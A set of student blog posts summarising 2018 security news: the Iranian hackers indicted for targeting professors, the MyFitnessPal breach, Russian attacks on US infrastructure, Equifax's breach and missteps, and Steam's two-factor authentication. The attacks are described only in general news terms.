Iranian Hackers Target US Professors

On March 23rd the Justice Department charged nine Iranians with multiple counts of identity theft and conspiracy to commit computer intrusions.  The main targets of the attack were professors at both US and foreign universities. Also targets were several US and European based private companies as well as multiple government agencies. The hackers were accused of being affiliated with the Mabna Institute and acted under behest of an Iranian intelligence agency. The attorney who brought the case claims that the Mabna Institute may seem legitimate, but that it only exists for the sole reason of stealing scientific resources from around the world. They used phishing emails that appeared to come from other universities to target more than 100,000 accounts belonging to professors worldwide and compromised about 8,000. They also compromised at least 37 US based companies, 11 based in Europe, and at least 5 government agencies including the Labor Department, the Federal Energy Regulatory Commission, and the UN. With this attack dating back to 2013, the hackers were able to steal more than 31 terabytes of information, worth about $3 billion in intellectual property. The justice department has recently said that the nine hackers are still at large.

–  Owen Ryan

Sources:

https://www.cnbc.com/2018/03/23/us-indicts-iranian-nationals-in-iran-government-backed-scheme-on-us-universities.html

https://www.wired.com/story/iran-cyberattacks-us-universities-indictment/

Advertisements

Under Armour: My FitnessPal Hack

On March 25, 2018, Under Armour was alerted of a breach that took place in February 2018. Under Armour notified the media, that 150 million MyFitnessPal user accounts were hacked from the breach of its database. However, since information like Social Security numbers and drivers license weren’t even asked for by the app, and since payment cards were processed separately, they were not stolen in the data breach. The stolen data consists of account usernames, as well as the email address associated with it and the hashed passwords. Meaning that though the passwords were obtained, they remained encrypted. The reason this is important to note is because, though the hackers have access to the above mentioned info, they still don’t have all the account passwords. Therefore, users still have time to change their passwords. Since many users use the same username and password across multiple sites and applications, it would be a good idea for them to change their passwords on their other accounts as well. Nevertheless, the risk still remains from this data breach. With the emails, the attackers are able to send phishing attacks to the user, making the email seem like its from the fitness app. Under Armour said it is working data security firms and law enforcement, but did not provide details on how the hackers got into its network or pulled out the data without getting caught in the act.

 

Sources:

https://www.reuters.com/article/us-under-armour-databreach/under-armour-says-150-million-myfitnesspal-accounts-breached-idUSKBN1H532W

https://www.slashgear.com/under-armour-myfitnesspal-hack-5-things-to-know-30525418/

-Noor Mohammad

Myfitnesspal.jpg

Russian Government Cyber Attacks Targeting Critical US Infrastructure

In this modern, technology-run day-and-age, the use of cyber hacking by one nation against another is an increasingly frequent method of attack. The United States Computer Emergency Readiness Team in joint with the DHS and FBI recently released a report outlining specific types of attacks they have identified being used by the Russian government targeting the U.S. government as well as “organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors”. They have also confirmed that these attacks have been ongoing since at least March of 2016.

One type of attack uses spear phishing emails containing Microsoft Word files loaded with a malicious script. These script first installs some credential-harvesting tools like Hydra and CrackMapExec. Then, it attempts to retrieve a file on a server via SMB request. By doing so—whether or not the file exists—an authentication request is typically prompted to the user before continuing. At this point, the script will capture the hash of the user’s credentials, and make an attempt to extract the full username and password using the aforementioned tools installed on the machine.

Another type of attack again used phishing to obtain credentials via a link in a falsified .pdf contract agreement. Users were directed to follow a link in the document to enter their email address and password in order to agree to the service contract. Once the credentials were in hand, attackers used them to attempt to gain access to the internal systems of these important infrastructure institutions. A back-door was installed to allow persistent access, and attackers could then modify firewall settings and Windows registry keys.

The release of this information is significant in two ways. First, it is just another example as to the extreme importance of vigilant cyber security awareness and practice. Both of these attacks rely on the ignorance and thoughtlessness on the side of the end-user to gain access into the system. Whether it’s opening unsolicited Microsoft Word documents or agreeing to unfamiliar (and unofficial) contracts, both scenarios rely on users divulging their credentials without suspicion as to whether the requesting source is legitimate.

Second, it is another example of the changing landscape of cyber security and cyber hacking as it continues to be used more frequently by governments as a weapon against other nations. Now more than ever is cyber security conversation and awareness important for all people as we enter an age of online warfare.

— Brendon Stowe
Student, R•I•T
Web & Mobile Computing


Source:
Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors

Equifax Breach Impacts An Additional 2.4 Million

Equifax has managed to come back into the news. Three weeks ago (March 1), Equifax released an update to the hack that happened over 6 months ago (June 2017). For those of you who do not know, Equifax is one of three credit reporting agencies in the United States. All financial information passes through at least one of these agencies. This includes bank accounts, loans, credit cards, etc. Almost everyone in the United States has used one of these companies in their lifetime, if not all of them. I will go further in depth about the several security issues Equifax dealt with back in June as well as in September, but for now I’m going to provide information on the most recent update.

Originally Equifax released the news that 143 million people had their personal information stolen. This information includes names, SSNs, birthdates, addresses, driver’s license numbers, and credit card numbers. The population of the United States is 325.7 million (2017), meaning nearly half of all Americans (44.67%) had their information stolen. If you consider the fact that this hack really only affects adults as children haven’t necessarily needed to use Equifax in the past, the percentage goes up to over 50%. When they released the new update, an additional 2.4 million people have been said to be affected by the breach. While that number is much smaller than the original, this number is also coming 6 months after the initial announcement. Hackers have had the personal information of 2.4 million people for 9 months (6 plus the 3 that it took them to mention it to the public, more on that later) without those people knowing. With this new information, the number rises to ~58% of all adult Americans who have had their information stolen through the Equifax breach. It is one of the largest hacks of personal information in history.

The attack itself happened somewhere between May and July and came from a flaw in the web application back-end Apache Struts. This allowed the hackers initial access to the Equifax computer system. By the time they were finished, the hackers had 30 separate entry points into Equifax’s systems. The only reason they were caught is because they were so deeply embedded in the systems that the company was forced to shut down a consumer complaint portal for 11 days while the security team figured out what was happening.

There are also reports that the company was notified 6 months in advance (December 2016) of the threat of a potential attack due to the security measures in place. An anonymous hacker found a flaw in the website that would allow anyone to pull information from all people in the database in a couple of minutes. This information included SSNs, names, and birthdates of all the individuals. This could be done through forced browsing, a technique that plugs various strings into a browser. Not only that, but the hacker also managed to find ways to get shell access to several Equifax servers, as well as several SQL Injection vulnerabilities. From reading several articles, it seems like Equifax’s main security policy was “Security by Obscurity”.

Now, most people think that the only issue was the breach that happened between mid-May to July. This is only part of Equifax’s downfall. Besides announcing 2.4 million people had been hacked 9 months after the incident happened, Equifax is credited with many mistakes that a student in CSEC 101 could’ve prevented. But first, let’s go over how Equifax handled the situation.

In July 2017, Equifax learned that it had been breached. The company then waited 6 weeks to tell the public that the breach had taken place. This meant that hackers had the personal information of hundreds of millions of people for 3 months and Equifax failed to announce it for over a month. Before announcing the company had been hacked, the top level executives at Equifax sold millions of dollars worth of stocks. Perhaps the one good practice they had was to provide a one year protection plan for anyone affected by the breach. However, this too had its downsides. In most cases, a year of protection isn’t enough. Because of the information that was leaked and how long it can take to decipher it, the attacks on the individual people may not even happen for another 5 to 10 years. What’s more, once the one year free trial runs out, you are automatically enrolled into the paid protection plan regardless of if you asked to be or not. You have to manually cancel your plan after the year of protection expires. Also, by agreeing to this protection plan, you enter an agreement with Equifax stating that you can no longer sue the company. However they did update this, by allowing the people who signed up to send a written letter within 30 days to Equifax to opt out of the agreement.

In order to find out if you have been hacked, they require you to go to their site (https://www.equifaxsecurity2017.com) and sign up to find out if you have been affected by the breach. And I wish I could say that Equifax stopped messing up there, but the story continues. Cyber security experts criticize Equifax for creating this website. They say it would have been more secure for them to have instead used their own website and provide an additional subdomain where people could enroll. And Equifax should have listened… A software engineer decided to show the world the security disasters that could derive from this situation. A new website securityequifax2017.com (it has since been taken down) was created to show how this affects the people trying to use Equifax’s website. The site copied the actual Equifax site, but added the line “Which is Totally Fake, Why Did Equifax Use A Domain That’s So Easily Impersonated By Phishing Sites?” to the title of the page (shown below).

Now this site was so “convincing” that Equifax tweeted to the fake website, not once, no that’s not the Equifax way, but seven times. The official Equifax twitter account tweeted to a fake website made to specifically demonstrate the security risks involved with making a long url with the title “Which is Totally Fake, Why Did Equifax Use A Domain That’s So Easily Impersonated By Phishing Sites?”. 200,000 people had signed up on the fake website before the creator took it down, proving his point about the security concerns involved.

Next on the list, Equifax’s website in Argentina. This is actually a separate hack that just happened to come about at the same time the news was being released about the previous hack. A cybersecurity firm was testing the strength of Equifax’s website and found that the username and login information for the database storing all the South American employee information was admin/admin. With this information, the firm was able to figure out Argentine SSN equivalents, names, and emails of over 100 employees of Equifax.

– Michael

Links:

Why are my Video Games Safer than my Bank Account?

Why are my Video Games Safer Than my Bank Account?

Valve software has implemented one of the most popular two-factor authentication(2FA) clients in the world. They use their mobile app to handle 2FA for accounts on their PC gaming platform Steam. They have pushed adoption of this by giving limitations on accounts that do not have it enabled. These limitations are mostly focused on trading in-game items such as trade-able copies of games, in game items such as different paint jobs, hats, or loot boxes. The nature of these items has caused these games to create a full blown economy, users relying on natural supply and demand to trade items with other users, on steam, or with third party sites. With how Valve’s own games are set up, most items can only be gotten from random via a paid loot box style system, with different rarities deciding how likely it is for a user to get an item. With supply limited by how much money users are willing to throw into digital items, and demand mostly placed on how these items look or their rarity, many of these items have value over $100, and some others with value even greater than $1,000.

Naturally, we ask, how does a video game company with 400 employees have better security on average for their users than most online banking accounts? In 2012, Valve did not have any of these securities in place, what drove them to force users’ hands to secure their accounts? Valve answered this as a response to fraud. With the popularity of these items increasing, they saw people posing as Valve staff or using phishing sites to get users passwords. These attacks grew rampant in 2012, and it was near impossible to find a steam account that didn’t have bot accounts posting phishing links in the comments. Valve finally added 2FA over email, requiring users to confirm trades with this too. This mitigated how much damage could be done when you knew someone’s steam login, as you still could not trade without the email.

Obviously, this wasn’t the end of the story, phishers were making ten of thousands of dollars and they weren’t planning to stop yet. They now employed new tactics, creating malware with the express purpose of gathering email login info and the local steam session files. These new attacks often relied on spreading this malware as popular communication programs. One personal encounter was someone that asked me to join their game, they said they were playing in a tournament and needed an extra player. I was abit on guard, and they asked me to join their voice server. The user gave me a link to what looked like the site for voice client, but was actually a fake. I caught it because it claimed to be a newer version than the one I had downloaded from the real site, and was a lot smaller. At this point, I knew it was a scam, but was amazed by how well orchestrated it was. This was about the time valve used their mobile app for all authentication. Locking accounts temporarily when it changed, and requiring all trades to be done through it or for them to get stuck pending for 3 days.

Now Valve has implemented some of the toughest required account security features in the industry. Their reasoning? To cut down the need for support to duplicate items people that were scammed. Because while account phishing was a problem, Valve was practically forced to duplicate the item for the victim. The original item was likely already sold to multiple people, via real world money or other items, and couldn’t be deleted without upsetting innocent users. With requirement of 2FA and account limitations, it is now impossible for a hacker to take items from an account without alerting the user. At best the hacker might be able to get 2FA removed and trade the item in 18 days, but usually the user would notice by then.

Steam accounts are safer than most bank accounts because Valve doesn’t want to upset their in game economy. And that only makes me wonder why banks don’t do the same, even Bank of America will let you transfer all your money online without a single 2FA or notification.

-Tyler Hart

https://support.steampowered.com/kb_article.php?ref=8625-wrah-9030

https://www.kotaku.com.au/2016/03/steam-users-think-valves-new-trading-restrictions-go-too-far/